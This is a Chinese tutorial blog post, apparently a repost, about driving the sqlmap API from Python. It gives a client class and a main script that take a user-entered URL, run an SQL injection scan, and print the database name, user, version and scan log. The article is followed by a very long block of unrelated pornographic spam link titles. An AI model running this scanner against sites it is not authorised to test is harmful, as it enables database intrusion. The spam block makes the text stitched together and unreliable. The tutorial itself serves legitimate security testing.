下面就來(lái)編寫(xiě)一個(gè)sqlmapapi調(diào)用程序,首先我們得再次明確一下流程:1、通過(guò) sqlmapapi.py -s -H "0.0.0.0" 開(kāi)啟sqlmap api的服務(wù)端。服務(wù)端啟動(dòng)后,在服務(wù)端命令行中會(huì)返回一個(gè)隨機(jī)的admin token值,這個(gè)token值用于管理taskid(獲取、清空操作),在這個(gè)流程中不需要amin token這個(gè)值,可以忽略。之后,服務(wù)端會(huì)處于一個(gè)等待客戶端的狀態(tài)。2、通過(guò)GET請(qǐng)求 http://ip:port/task/new 這個(gè)地址,即可創(chuàng)建一個(gè)新的掃描任務(wù),在響應(yīng)中會(huì)返回一個(gè)隨機(jī)的taskid。這個(gè)taskid在這個(gè)流程中尤為重要,因此需要通過(guò)變量存儲(chǔ)下來(lái),方便后面程序的調(diào)用。3、通過(guò)POST請(qǐng)求 http://ip:port/scan//start 地址,并通過(guò)json格式提交參數(shù)(待掃描的HTTP數(shù)據(jù)包、若存在注入是否獲取當(dāng)前數(shù)據(jù)庫(kù)用戶名),即可開(kāi)啟一個(gè)掃描任務(wù),該請(qǐng)求會(huì)返回一個(gè)enginedid。4、通過(guò)GET請(qǐng)求 http://ip:port/scan//status 地址,即可獲取指定的taskid的掃描狀態(tài)。這個(gè)返回值分為兩種,一種是run狀態(tài)(掃描未完成),一種是terminated狀態(tài)(掃描完成)。5、判斷掃描狀態(tài),如果掃描未完成,再次請(qǐng)求 http://ip:port/scan//status 地址 ,直到掃描完成。6、掃描完成后獲取掃描的結(jié)果,是否是SQL注入,若不存在SQL注入,data字段為空,若存在SQL注入,則會(huì)返回?cái)?shù)據(jù)庫(kù)類型、payload等等。

明確了流程后,為了可維護(hù)性好和main.py文件代碼量少,筆者首先是寫(xiě)了一個(gè)類,代碼如下:#!/usr/bin/python

# -*- coding:utf-8 -*-

# wirter:En_dust

import requests

import json

import time

class Client():

def __init__(self,server_ip,server_port,admin_token="",taskid="",filepath=None):

self.server = "http://" + server_ip + ":" + server_port

self.admin_token = admin_token

self.taskid = taskid

self.filepath = ""

self.status = ""

self.scan_start_time = ""

self.scan_end_time = ""

self.engineid=""

self.headers = {'Content-Type': 'application/json'}

def create_new_task(self):

'''創(chuàng)建一個(gè)新的任務(wù),創(chuàng)建成功返回taskid'''

r = requests.get("%s/task/new"%(self.server))

self.taskid = r.json()['taskid']

if self.taskid != "":

return self.taskid

else:

print("創(chuàng)建任務(wù)失敗!")

return None

def set_task_options(self,url):

'''設(shè)置任務(wù)掃描的url等'''

self.filepath = url

def start_target_scan(self,url):

'''開(kāi)始掃描的方法,成功開(kāi)啟掃描返回True,開(kāi)始掃描失敗返回False'''

r = requests.post(self.server + '/scan/' + self.taskid + '/start',

data=json.dumps({'url':url,'getCurrentUser':True,'getBanner':True,'getCurrentDb':True}),

headers=self.headers)

if r.json()['success']:

self.scan_start_time = time.time()

#print(r.json())

#print(r.json()['engineid'])

return r.json()['engineid']

else:

#print(r.json())

return None

def get_scan_status(self):

'''獲取掃描狀態(tài)的方法,掃描完成返回True,正在掃描返回False'''

self.status = json.loads(requests.get(self.server + '/scan/' + self.taskid + '/status').text)['status']

if self.status == 'terminated':

self.scan_end_time = time.time()

#print("掃描完成!")

return True

elif self.status == 'running':

#print("Running")

return False

else:

#print("未知錯(cuò)誤!")

self.status = False

def get_result(self):

'''獲取掃描結(jié)果的方法,存在SQL注入返回payload和注入類型等,不存在SQL注入返回空'''

if(self.status):

r = requests.get(self.server + '/scan/' + self.taskid + '/data')

if (r.json()['data']):

return r.json()['data']

else:

return None

def get_all_task_list(self):

'''獲取所有任務(wù)列表'''

r = requests.get(self.server + '/admin/' + self.admin_token + "/list")

if r.json()['success']:

#print(r.json()['tasks'])

return r.json()['tasks']

else:

return None

def del_a_task(self,taskid):

'''刪除一個(gè)任務(wù)'''

r = requests.get(self.server + '/task/' + taskid + '/delete')

if r.json()['success']:

return True

else:

return False

def stop_a_scan(self,taskid):

'''停止一個(gè)掃描任務(wù)'''

r = requests.get(self.server + '/scan/' + taskid + '/stop')

if r.json()['success']:

return True

else:

return False

def flush_all_tasks(self):

'''清空所有任務(wù)'''

r =requests.get(self.server + '/admin/' + self.admin_token + "/flush")

if r.json()['success']:

return True

else:

return False

def get_scan_log(self):

'''獲取log'''

r = requests.get(self.server + '/scan/' + self.taskid + '/log')

return r.json()

mian.py#!/usr/bin/python

# -*- coding:utf-8 -*-

# wirter:En_dust

from Service import Client

import time

from threading import Thread

def main():

'''實(shí)例化Client對(duì)象時(shí)需要傳遞sqlmap api 服務(wù)端的ip、port、admin_token和HTTP包的絕對(duì)路徑'''

print("————————————————Start Working!—————————————————")

target = input("url:")

task1 = Thread(target=set_start_get_result,args=(target,))

task1.start()

def time_deal(mytime):

first_deal_time = time.localtime(mytime)

second_deal_time = time.strftime("%Y-%m-%d %H:%M:%S", first_deal_time)

return second_deal_time

def set_start_get_result(url):

#/home/cheng/Desktop/sqldump/1.txt

current_taskid = my_scan.create_new_task()

print("taskid: " + str(current_taskid))

my_scan.set_task_options(url=url)

print("掃描id:" + str(my_scan.start_target_scan(url=url)))

print("掃描開(kāi)始時(shí)間:" + str(time_deal(my_scan.scan_start_time)))

while True:

if my_scan.get_scan_status() == True:

print(my_scan.get_result())

print("當(dāng)前數(shù)據(jù)庫(kù):" + str(my_scan.get_result()[-1]['value']))

print("當(dāng)前數(shù)據(jù)庫(kù)用戶名:" + str(my_scan.get_result()[-2]['value']))

print("數(shù)據(jù)庫(kù)版本:" + str(my_scan.get_result()[-3]['value']))

print("掃描結(jié)束時(shí)間:" + str(time_deal(my_scan.scan_end_time)))

print("掃描日志:\n" + str(my_scan.get_scan_log()))

break

if __name__ == '__main__':

my_scan = Client("127.0.0.1", "8775", "c88927c30abb1ef6ea78cb81ac7ac6b0")

main()

*本文作者:看不盡的塵埃,本文屬FreeBuf原創(chuàng)獎(jiǎng)勵(lì)計(jì)劃,未經(jīng)許可禁止轉(zhuǎn)載。

創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來(lái)咯,堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)

總結(jié)

以上是生活随笔為你收集整理的java web sqlmapapi,深入了解SQLMAP API的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。

欧美日韩三区二区 | 午夜国产成人 | 精品欧美乱码久久久久久 | 久久久天堂 | 人人爽爽人人 | 国产精品av在线 | 亚洲综合在线播放 | 91久久一区二区 | 精品久久久久久久久久久院品网 | 摸bbb搡bbb搡bbbb| 精品国产乱码久久久久久浪潮 | 六月丁香婷 | 天天色天天操天天爽 | 国产精品9区 | 午夜久久久影院 | 9色在线视频 | 在线中文字幕网站 | 亚洲精品永久免费视频 | 在线观看黄 | 日韩午夜在线观看 | 在线观看免费版高清版 | 中文字幕人成乱码在线观看 | 欧美性生活大片 | 精品一区二区久久久久久久网站 | 中文字幕在线有码 | 国产专区精品视频 | 免费在线观看日韩视频 | 日本久久久久久久久久 | 亚洲国产一区二区精品专区 | 精品视频免费 | 丁香六月国产 | 日韩69av | 日韩超碰在线 | 成人av电影免费在线播放 | 亚洲国产成人在线 | 免费观看一级成人毛片 | av亚洲产国偷v产偷v自拍小说 | 午夜婷婷在线播放 | 99视频久久 | 国产69精品久久久久久久久久 | 久久国产免费看 | 亚洲做受高潮欧美裸体 | 欧美日韩视频在线观看免费 | 国产视频欧美视频 | 日韩av中文字幕在线 | 国产 亚洲 欧美 在线 | 69精品视频在线观看 | 国产婷婷 | 日韩两性视频 | 正在播放国产一区二区 | 久久精品久久99精品久久 | 国产99久久久国产精品成人免费 | 国产破处在线视频 | 香蕉视频国产在线 | h动漫中文字幕 | 97精品电影院| 日韩精品视频在线观看网址 | 成人免费视频网站 | 亚洲国产日韩欧美 | 国产欧美日韩一区 | av视屏在线| 日日干夜夜爱 | 国产精品久久久久久久久岛 | 国产麻豆精品95视频 | 99精品网站| 91污污| 波多野结衣在线播放视频 | 日韩免费播放 | 天天射网| 韩国精品在线观看 | 黄色精品一区二区 | 国产成人三级在线观看 | 日韩精品2区| 日韩一区在线免费观看 | 91污在线| 97超碰网| 国产精品一区二区免费在线观看 | 欧美日韩一级在线 | 探花国产在线 | 久久精品1区2区 | 亚洲欧美国产视频 | 久久久久久久久久电影 | 国产精品一区二区三区免费看 | 91国内在线| 国产视频一区在线免费观看 | 精品国产一区二区三区久久久 | 精品免费在线视频 | 中文字幕在线播放日韩 | 国产成人精品日本亚洲999 | 人人狠狠综合久久亚洲婷 | 97福利 | 午夜性福利 | 青草草在线视频 | 91大神dom调教在线观看 | 视频成人免费 | 国产精品国产三级国产aⅴ入口 | 在线视频 精品 | 日韩免费视频网站 | 99视频导航 | 日韩一三区 | 欧美日bb | 国内精品久久久久久久影视麻豆 | 亚洲精品美女视频 | 欧美色插 | 婷婷六月丁| 国内精品久久久久影院男同志 | 99热在线观看| 97视频在线播放 | 麻豆视频免费在线 | 久久91久久久久麻豆精品 | 香蕉视频色 | 日本中文字幕网 | 日日夜夜爱| 色多多视频在线 | 久久国产区 | 天天干人人插 | 韩国在线一区 | 在线视频日韩欧美 | 手机成人在线电影 | 日韩欧美在线不卡 | 精品 激情 | 久久精品网站免费观看 | 久久天堂影院 | 久久免视频| a视频在线 | 天天插天天狠天天透 | 色狠狠操 | 在线国产日本 | 91在线观看视频 | 99爱这里只有精品 | 欧美最猛性xxxx | 久草在线中文视频 | 在线观看国产区 | 色婷婷在线观看视频 | 亚洲精品乱码久久久久v最新版 | 三级性生活视频 | 日韩黄色软件 | 色窝资源 | 免费在线观看午夜视频 | www.色爱 | 免费观看91| 久久精品香蕉视频 | 91最新网址在线观看 | 国产偷在线 | 日韩中字在线 | 91福利社区在线观看 | 日韩午夜在线观看 | 日本3级在线观看 | 精品视频在线观看 | 天天做天天爱夜夜爽 | 欧美一区二区三区激情视频 | 亚洲黄色小说网址 | 天天干天天看 | 69xxxx欧美| av黄免费看 | 97超在线视频 | 五月婷婷六月丁香激情 | 亚洲国产影院 | 国产精品成人在线 | 黄色a一级片 | 深夜国产福利 | 中文字幕丰满人伦在线 | 免费久久网站 | 182午夜在线观看 | 亚洲第一成网站 | 91精品网站在线观看 | 亚洲综合五月天 | 天天操天天插 | 亚洲国产高清在线 | 免费视频a | 亚洲视频 在线观看 | 欧美精品久久人人躁人人爽 | 福利视频一区二区 | 免费福利视频网 | 香蕉视频国产在线观看 | 2024国产在线 | 亚洲成av人影片在线观看 | 国产69精品久久app免费版 | 久久黄色美女 | 狠狠色丁香九九婷婷综合五月 | 国产一级视频免费看 | 天天干天天天天 | 99久久久久免费精品国产 | 激情av资源 | av片中文字幕 | 在线有码中文 | 波多野结衣一区二区三区中文字幕 | 国产一区精品在线观看 | 成人黄色毛片视频 | 在线观看视频99 | 国内精品久久久精品电影院 | 国产免费又爽又刺激在线观看 | 国产专区一| 日韩中文字幕免费视频 | 久久久久久久久久久久久久免费看 | 毛片永久免费 | 日韩精品一区二 | 日韩午夜电影院 | 中文字幕日本特黄aa毛片 | 不卡国产视频 | 午夜成人影视 | a资源在线| 精品国产乱子伦一区二区 | 亚洲一区精品人人爽人人躁 | 亚洲无在线 | 国产亚洲精品久久久久5区 成人h电影在线观看 | 在线观看色网 | 正在播放 久久 | 亚洲视频播放 | 久久99精品国产99久久 | 在线播放亚洲激情 | 欧美性生活小视频 | 国产精品1区 | 午夜视频在线网站 | 在线观看一区二区视频 | 91最新网址 | 久久99国产精品免费网站 | 黄色一级在线视频 | 麻豆免费视频 | 亚洲精品视频在线播放 | 三级免费黄色 | 成人h动漫精品一区二 | 黄色a一级视频 | 在线视频电影 | 国产黄色大片免费看 | 麻豆精品传媒视频 | 久久99免费视频 | 国产自产在线视频 | 精品国产一区二区三区蜜臀 | 麻豆一区二区 | 日韩字幕 | 97超在线 | 狠狠色丁香久久婷婷综合丁香 | 国产亚洲片 | 日韩区欧美久久久无人区 | 久亚洲 | 五月天激情婷婷 | 国产精品自产拍在线观看中文 | 国产精品观看视频 | 91九色综合 | 中国老女人日b | 日韩精品观看 | 亚洲最大av网站 | 国产免费中文字幕 | 婷婷久久五月天 | 中文字幕精品视频 | 国产字幕在线观看 | 美女网站色在线观看 | 免费av一级电影 | 中文字幕美女免费在线 | 在线成人小视频 | 在线精品视频在线观看高清 | 日韩欧美视频在线播放 | 久久草草影视免费网 | 国产美女精品视频 | 91精品麻豆| 中文字幕在线免费观看 | 亚洲精品免费视频 | 激情视频一区二区三区 | 中文字幕色在线 | 国产三级国产精品国产专区50 | 最近更新好看的中文字幕 | 美腿丝袜一区二区三区 | 国产黑丝一区二区 | 中文字幕免费高清在线观看 | 欧美成人在线网站 | 九九精品久久久 | 免费日韩一区二区三区 | 日韩大陆欧美高清视频区 | 99精品视频在线观看 | 国产成人性色生活片 | 亚洲 欧洲 国产 精品 | 国产亚洲精品中文字幕 | 亚洲精选99| 日本中文字幕电影在线免费观看 | 五月婷婷欧美视频 | 一级a毛片高清视频 | 国产精品久久毛片 | 狠狠干,狠狠操 | 免费成人在线视频网站 | 亚洲精品乱码久久久久久写真 | 天天天综合 | 日韩免费视频线观看 | 你操综合| 亚洲电影黄色 | 成人av在线影视 | 久久国产影院 | 天天舔天天搞 | 91高清免费看 | 日韩av黄 | 亚洲精品在线观看视频 | www.色婷婷.com | 丁香影院在线 | 日韩超碰 | 久久久首页 | 久久久国产精品一区二区三区 | 国产在线 一区二区三区 | 91在线porny国产在线看 | 久久综合操| 九九日九九操 | 97在线播放 | 一区二区三区免费在线观看视频 | 色视频国产直接看 | 伊人国产视频 | 亚洲国产av精品毛片鲁大师 | 国产在线观看一区 | 亚洲欧美日韩在线看 | 在线免费黄色av | 久久综合影院 | 欧美激情第八页 | 久草久草在线观看 | 日韩二级毛片 | 久久精品99久久 | 国产精品区二区三区日本 | 91麻豆国产 | 91女神的呻吟细腰翘臀美女 | 国产手机在线精品 | 天天操天天爽天天干 | 人人爽人人爱 | 亚洲日韩中文字幕在线播放 | 日韩精品视频第一页 | 欧美亚洲国产精品久久高清浪潮 | 国产 一区二区三区 在线 | 亚洲精品视频免费 | 色综合a| 久久久久久久久免费 | 日韩网站在线免费观看 | 亚洲精品午夜久久久 | 久久精品人人做人人综合老师 | 一级黄色电影网站 | 黄污视频大全 | 国产成人精品综合久久久久99 | 91成人观看 | 日本爱爱免费视频 | 久久天天躁 | 欧美一级电影片 | 一级特黄aaa大片在线观看 | 日日草夜夜操 | 一本之道乱码区 | 免费中文字幕视频 | 六月丁香婷婷在线 | 中文字幕在线影院 | 欧美91视频 | 久久成人麻豆午夜电影 | 天天综合色网 | 狠狠色丁香 | 国产九九精品视频 | 免费在线一区二区 | 成人毛片在线观看视频 | 99久久精品午夜一区二区小说 | 免费视频国产 | 91精品视频网站 | 日日草av | 天天天天天操 | 久久与婷婷 | 亚洲观看黄色网 | 就要干b| 日韩av不卡播放 | 亚洲天堂自拍视频 | 日日夜夜网 | 久久综合成人网 | 国产a级免费 | 日韩免| 亚洲黄色免费在线 | 在线视频精品 | 91看片看淫黄大片 | 中文综合在线 | 不卡的av中文字幕 | 久久在视频| mm1313亚洲精品国产 | 国产69精品久久久久99尤 | 在线观看国产亚洲 | 91在线播放视频 | 天天做天天爱夜夜爽 | 玖玖国产精品视频 | 欧美少妇bbwhd | 婷婷色综合网 | 999久久国精品免费观看网站 | 中文字幕一区二区三区四区久久 | 国产97色 | 久草香蕉在线视频 | 六月婷婷久香在线视频 | 欧美激情综合五月色丁香 | 欧美久久久久久久久久久久久 | 久久精品中文字幕 | 日日操网站 | 国产传媒中文字幕 | 国产美腿白丝袜足在线av | 久久你懂的 | 成年人毛片在线观看 | 国产精品久久久久久久7电影 | 99精品在线视频播放 | 久久久国产精品一区二区三区 | 五月婷婷.com | 国产伦精品一区二区三区无广告 | 丁香色综合 | 最新中文字幕在线观看视频 | 2020天天干夜夜爽 | 色视频网站在线观看一=区 a视频免费在线观看 | 久草在线在线 | 国产美女视频免费 | 欧美激情综合五月 | 国产精品毛片一区二区在线 | 婷婷综合导航 | 999电影免费在线观看 | 国内外成人免费在线视频 | 亚欧日韩av | 91激情视频在线观看 | 国产在线污 | 日韩精品视频一二三 | 天天久久夜夜 | 欧美日韩在线观看不卡 | 国产精品一区二区 91 | 成人在线你懂得 | 在线免费精品视频 | 在线中文字幕视频 | 久久不卡日韩美女 | 国产91探花 | 五月开心激情网 | 青草视频在线 | 免费网站看av片 | 亚洲韩国一区二区三区 | 日韩精品久久久 | 天天操天天爱天天干 | 免费观看v片在线观看 | 欧美一区二区三区免费看 | 9在线观看免费高清完整 | 亚洲综合成人在线 | 91在线视频观看免费 | 久久激情小视频 | 99视频精品免费观看, | 在线看片一区 | 中文字幕一区二区三区四区久久 | 在线观看免费一级片 | 好看av在线| 国产成人免费网站 | 成人精品国产免费网站 | 久久伊人精品天天 | 久久久久久毛片精品免费不卡 | 免费成人在线观看 | 精品视频在线免费 | av官网在线 | 黄色的视频 | 日韩v在线91成人自拍 | 亚洲精品综合一二三区在线观看 | 在线观看视频你懂得 | 中文字幕资源在线 | 最近免费中文字幕大全高清10 | 国产精品一区二区在线观看免费 | 亚洲一区二区观看 | 日本中文字幕在线免费观看 | 欧美成人区 | 国内少妇自拍视频一区 | 亚洲精品视频在线 | 四虎海外影库www4hu | 高清美女视频 | 在线观看成人国产 | 中文字幕亚洲五码 | 天天做综合网 | 国产精品欧美一区二区三区不卡 | 亚洲国产中文字幕 | 人人精品| 亚洲一级黄色av | 中文一区在线观看 | 国产成人免费网站 | 国产福利av | 99免费观看视频 | 少妇高潮冒白浆 | 欧美疯狂性受xxxxx另类 | 久久视频在线观看免费 | 国产精品久久久久久婷婷天堂 | 国产午夜一级毛片 | 亚洲成熟女人毛片在线 | 99热都是精品 | av黄色av | 日本视频高清 | 国产码电影 | 精品视频123区在线观看 | 日韩免费看视频 | 中文字幕在线视频精品 | 黄色毛片一级片 | 久久人人爽人人 | 久久97精品| 久草视频在线免费播放 | 亚洲国产精品一区二区久久,亚洲午夜 | 五月婷婷综合在线 | 在线国产视频 | 一级成人网| 在线观看福利网站 | 又爽又黄在线观看 | 97国产在线播放 | 欧美精品三级在线观看 | 亚洲无在线 | 国产视频丨精品|在线观看 国产精品久久久久久久久久久久午夜 | 91伊人久久大香线蕉蜜芽人口 | 天天操天天射天天爱 | 久久久久综合视频 | 精品久久久久久久久久 | 美女网站视频色 | 国产一区二区在线观看免费 | 五月婷婷激情综合网 | 狠狠干天天色 | 欧美日韩免费在线观看视频 | 在线观看国产麻豆 | 97超碰在线久草超碰在线观看 | 国产精品黑丝在线观看 | 国产视频一区在线播放 | 久久久精品二区 | 久久成人一区二区 | 久久久久久免费网 | 99爱视频在线观看 | 久久久亚洲电影 | 国产黄色一级片在线 | 欧美少妇xx | 天堂av免费观看 | 国产精品久久久久久爽爽爽 | 国产黄色片在线免费观看 | 国产午夜激情视频 | 久久99国产精品自在自在app | www.五月天激情 | 亚洲一区二区高潮无套美女 | 欧美日本中文字幕 | 国产一区二区在线免费播放 | 色www永久免费| 一级久久精品 | 成人影片在线免费观看 | 精品视频123区在线观看 | 国产黄色片免费 | 超碰个人在线 | 免费日韩一区二区三区 | 超碰97免费 | 在线观看麻豆av | 国产精品女教师 | 亚洲欧美在线视频免费 | 五月天激情综合网 | 成片视频免费观看 | 国产精品久久久久永久免费看 | 午夜精品久久久久久久99婷婷 | 日韩在线第一 | a√国产免费a | 97在线视频免费观看 | 国产精品久久久av | 超碰在线97观看 | 日韩av电影手机在线观看 | 色婷婷久久久综合中文字幕 | 欧美狠狠操 | 欧美精品久久人人躁人人爽 | 黄色网址在线播放 | 97在线观看免费高清完整版在线观看 | 欧美aaa级片 | 中文字幕中文字幕在线中文字幕三区 | 成人动漫一区二区三区 | 日韩欧美在线一区 | 免费在线一区二区 | 日韩一二三区不卡 | 欧美大香线蕉线伊人久久 | 日韩一区二区三区观看 | 欧美淫视频 | jizz18欧美18| 久久天堂影院 | 亚洲国产成人久久综合 | 日韩久久激情 | 亚洲国产综合在线 | 日韩综合一区二区三区 | 91大神精品视频在线观看 | 国产精品99精品久久免费 | x99av成人免费| 日本精品一| 九九综合九九综合 | 99久久精品免费看国产麻豆 | 久久精品欧美 | 日韩一区二区三区免费视频 | 人人干狠狠干 | 久草网在线观看 | 欧美日韩不卡在线视频 | 黄色免费网战 | 色在线亚洲 | 国产亚洲va综合人人澡精品 | 欧美在线观看小视频 | 国产视频欧美视频 | 免费一级片在线 | bbw av| 国产一区欧美日韩 | 在线黄色av电影 | 美女在线免费视频 | 麻豆影视网 | 就要色综合 | 在线观看国产日韩 | 国产一级二级三级在线观看 | 五月婷香蕉久色在线看 | 丁香五月缴情综合网 | 在线观看免费一级片 | 久久久一本精品99久久精品 | 91精品人成在线观看 | 欧美日韩国产亚洲乱码字幕 | 一区二区中文字幕在线播放 | 91精品一区二区三区久久久久久 | 99视屏| 婷婷六月丁香激情 | 亚洲成a人片在线观看网站口工 | 国产一区在线免费 | 亚洲电影网站 | 欧美日韩视频免费 | 色视频网站免费观看 | 九九九九九精品 | 天天干,天天干 | 国产精品欧美日韩 | 亚洲一区网站 | 久久夜av | 天堂网一区二区三区 | 免费在线观看国产精品 | 国产中文在线字幕 | 久久香蕉电影 | 99热.com| 日韩欧美一区二区不卡 | 日本精品小视频 | 日韩免费一级a毛片在线播放一级 | 成人久久网 | 国产午夜精品一区二区三区四区 | 久久精品一 | 国产人成在线视频 | 91视频大全 | 亚洲精品欧美精品 | 亚洲va欧美va人人爽 | 7799av | 在线观看亚洲专区 | 一级片免费在线 | 91日韩在线播放 | 日韩久久精品一区二区 | 成人黄大片| 久久久精选 | 中文字幕视频 | 六月天综合网 | 91欧美国产 | 永久中文字幕 | 日韩中文字幕免费 | 亚洲成人精品国产 | 亚洲极色| 中国成人一区 | 国产精品白浆视频 | 国产精品免费观看国产网曝瓜 | 日韩免费一区二区 | 亚洲精品88欧美一区二区 | 91在线资源 | 99re视频在线观看 | 中文字幕一区二区三区四区视频 | 九九九免费视频 | 久久精品国产精品亚洲 | 亚洲精品乱码久久久久久高潮 | 成人国产精品久久久春色 | 日韩av一卡二卡三卡 | 国产成人精品一区二区在线 | 久久久久久久久久电影 | 97精产国品一二三产区在线 | 久久99影院 | 91精品在线免费观看 | 午夜精品一区二区三区可下载 | 国产精品久久久免费 | 婷婷深爱| 黄www在线观看 | 中文在线8新资源库 | 涩av在线 | 91精品视频在线观看免费 | 成人小视频在线免费观看 | 欧美一级日韩三级 | 超碰在线94| 亚洲国产精品99久久久久久久久 | 91亚洲国产成人 | 97超碰在线免费观看 | 超碰在线人 | 一区二区三区手机在线观看 | 天天夜操 | 免费av 在线| 久久精品国产精品 | 国产精品专区h在线观看 | 久草视频在线资源站 | 天堂av网址 | 97在线视频免费看 | 欧美日产在线观看 | 日韩精品一区二区免费 | 91av视频导航 | 啪嗒啪嗒免费观看完整版 | 成人在线视频观看 | 国产一级精品在线观看 | 99九九热只有国产精品 | 97在线观看视频免费 | 国产一区二三区好的 | 激情视频在线观看网址 | 精品高清视频 | 成年人免费在线 | 久久久久久久影视 | 九九视频免费观看视频精品 | 黄色亚洲免费 | 日韩中文在线视频 | 黄色视屏在线免费观看 | 亚洲精品综合在线 | 久久国产精品一区二区三区四区 | 精品国产一区二区三区久久久 | 国产69熟| 日本中文字幕电影在线免费观看 | 国产一区播放 | 国产又粗又长又硬免费视频 | 久久久久久久久网站 | 99热精品国产一区二区在线观看 | 国产精品久久久久久久久岛 | 久久怡红院 | 五月天综合网站 | 豆豆色资源网xfplay | 91在线成人 | 99久久精品国产亚洲 | 在线欧美最极品的av | 婷婷综合在线 | 国产在线观看中文字幕 | 九九99| a级国产乱理论片在线观看 伊人宗合网 | 久久在线免费观看视频 | 精品国产免费一区二区三区五区 | 精品久久免费看 | 亚洲欧洲中文日韩久久av乱码 | 久久蜜桃av| 国产精品理论片 | 天天干中文字幕 | 国产精品一区二区av麻豆 | 久久精品爱视频 | 一区二区三区在线影院 | 日韩欧美电影网 | 国产视频 亚洲精品 | 精品一区二区在线免费观看 | 在线观看日本高清mv视频 | 亚洲黄色av网址 | 国产99久久久国产精品免费看 | 久久精品欧美一 | 国产精品黄网站在线观看 | 国产精品高清免费在线观看 | 激情片av | 日韩专区一区二区 | 色综合网在线 | 国产尤物在线视频 | 国产中文字幕一区 | 久久夜色电影 | 国产精品理论片 | 色a在线观看 | 国产日韩精品一区二区三区 | 最近乱久中文字幕 | 国产91免费看 | 九九色网 | 国产不卡在线 | 色婷婷电影 | 久久久www成人免费精品 | 国产亚洲午夜高清国产拍精品 | 国产成人精品免费在线观看 | 四虎免费在线观看视频 | 国产一级a毛片视频爆浆 | 国产美女免费 | 久久视频免费观看 | 国产99久久久久久免费看 | 欧美一级片 | 久久在视频 | 天天操天天干天天操天天干 | 久久视频免费在线 | 亚洲开心色 | 成人av资源网站 | 国产在线观看二区 | 成片免费 | 国内精品久久久久久中文字幕 | 欧美 日韩 久久 | 午夜一级免费电影 | 国产一级三级 | 丁香六月色 | 在线国产日韩 | www免费网站在线观看 | 激情综合一区 | 五月婷婷在线视频观看 | 91香蕉国产在线观看软件 | 国产亚洲字幕 | 国产 日韩 在线 亚洲 字幕 中文 | 国产免费专区 | 欧美精品国产综合久久 | av网址aaa| 日日操操操 | 一区二区三区韩国免费中文网站 | 国产手机免费视频 | 懂色av一区二区在线播放 | 日本精品在线看 | 成人一级在线观看 | 亚洲精品玖玖玖av在线看 | 久久97久久97精品免视看 | 日韩理论电影在线观看 | 亚洲精品乱码久久久久久蜜桃91 | 夜夜躁日日躁 | 西西444www| 国产精品第52页 | 亚洲美女精品视频 | 欧美精品你懂的 | 欧洲av不卡 | 久久综合影院 | 在线观看视频97 | 国产成人黄色片 | 中文字幕资源在线观看 | 国产小视频在线免费观看视频 | 中文字幕在线看人 | 91精品久久久久久久久 | 国产白浆视频 | 中文字幕在线观看视频一区二区三区 | 波多野结衣视频一区 | 日韩视频一区二区三区在线播放免费观看 | 91色偷偷| 99精品毛片| www久久九 | 精品视频网站 | 久久精品亚洲精品国产欧美 | 久久精品视频在线播放 | 婷婷激情站 | 久久久精品二区 | 日本三级在线观看中文字 | 国产高清视频免费在线观看 | 欧美成天堂网地址 | 国产九色视频在线观看 | 亚洲激情 在线 | 亚洲免费在线观看视频 | 日韩视频在线一区 | 色婷婷激情综合 | 蜜臀91丨九色丨蝌蚪老版 | 国产99精品在线观看 | 一区二区观看 | 久久精品人人做人人综合老师 | wwwwwww色| 国产精品二区三区 | 国产精品影音先锋 | 久久大片网站 | 日韩欧美精品一区 | 国产精品理论在线观看 | 日韩欧美视频一区二区 | 国产精品 9999 | 精品一区二区久久久久久久网站 | 天天草天天爽 | 久视频在线播放 | 国产精品久久久久一区二区三区共 | 久久久精品国产一区二区电影四季 | 国产精品久久久久aaaa九色 | 亚洲男男gaygay无套 | 欧美亚洲精品一区 | 久久久久女人精品毛片九一 | 国产一级高清视频 | 黄p在线播放 | 日本爱爱片 | 毛片美女网站 | 亚洲精品88欧美一区二区 | 国产在线观 | 99视频在线精品国自产拍免费观看 | av在线免费播放网站 | 国产精品完整版 | 欧美性生爱 | 午夜精品久久 | 成年人国产在线观看 | 日韩欧美在线观看一区二区三区 | 精品9999| 色综合久久精品 | 亚洲国产精久久久久久久 | 91国内在线 | 91看片淫黄大片在线播放 | 久久久久久国产精品亚洲78 | 午夜精品一二三区 | 午夜91在线 | 国产视频二区三区 | 国产在线观看99 | 国产一区免费在线 | 久草成人在线 | 日韩专区 在线 | 99久久精品视频免费 | 一区二区视频播放 | 日日夜夜干 | 国产精品第一页在线 | 日韩中文字幕免费电影 | av在线看网站| 在线黄色国产 | 在线观看精品一区 | 国产伦理久久精品久久久久_ | 欧美黄色免费 | 99久久99久久精品国产片 | 成年人毛片在线观看 | 日本免费一二三区 | 日本深夜福利视频 | 99视频一区 | 91网在线| 日韩av黄| 国产麻豆精品一区 | 一区二区三区高清 | 精品亚洲一区二区 | 日韩精品久久久久久久电影99爱 | 日本黄色免费网站 | 久久久精品免费观看 | 欧美精品一区二区蜜臀亚洲 | 久久久国产精品久久久 | 欧美日韩精品综合 | 久久兔费看a级 | 日韩午夜电影院 | 五月婷婷免费 | 色国产精品一区在线观看 | 国产美女网站在线观看 | 亚洲久草在线视频 | 精品理论片 | 国产精品免费久久 | 青青河边草免费直播 | 99久久一区| 日韩亚洲在线观看 | 国产麻豆电影在线观看 | 国产麻豆剧果冻传媒视频播放量 | 久久成人国产精品入口 | av黄色亚洲 | 国产91精品一区二区麻豆网站 | 久久免费视频在线观看 | 99九九视频| 久久伊人婷婷 | 中文字幕在线视频国产 | 国产精品va | 成人a视频片观看免费 | 精品一二区 | 91精选在线观看 | 免费看国产精品 | 国产亚洲精品久久久久久大师 | 在线观看福利网站 | 日韩a欧美 | aav在线| 色婷婷午夜 | 久久中文字幕在线视频 | 久久久久久久久久网 | 日韩在线观看电影 | 在线中文视频 | 免费在线观看毛片网站 | 91免费国产在线观看 | 成人国产电影在线观看 | 一区二区 精品 | 天天操天天操天天操天天操 | 99热 精品在线 | 日韩在线观看第一页 | 久久综合加勒比 | 久久久精品国产一区二区电影四季 | 色综合夜色一区 | 日韩99热 | 91网站在线视频 | 亚洲激情网站免费观看 | 日韩特黄一级欧美毛片特黄 | 久久免费电影网 | www看片网站 | 91爱在线| 国产精品精品久久久久久 | 久久专区 | 免费在线一区二区三区 | 亚洲精品美女 | 97国产在线播放 | 亚洲欧洲成人精品av97 | 97网站| 欧美日韩精品影院 | 亚洲国产激情 | 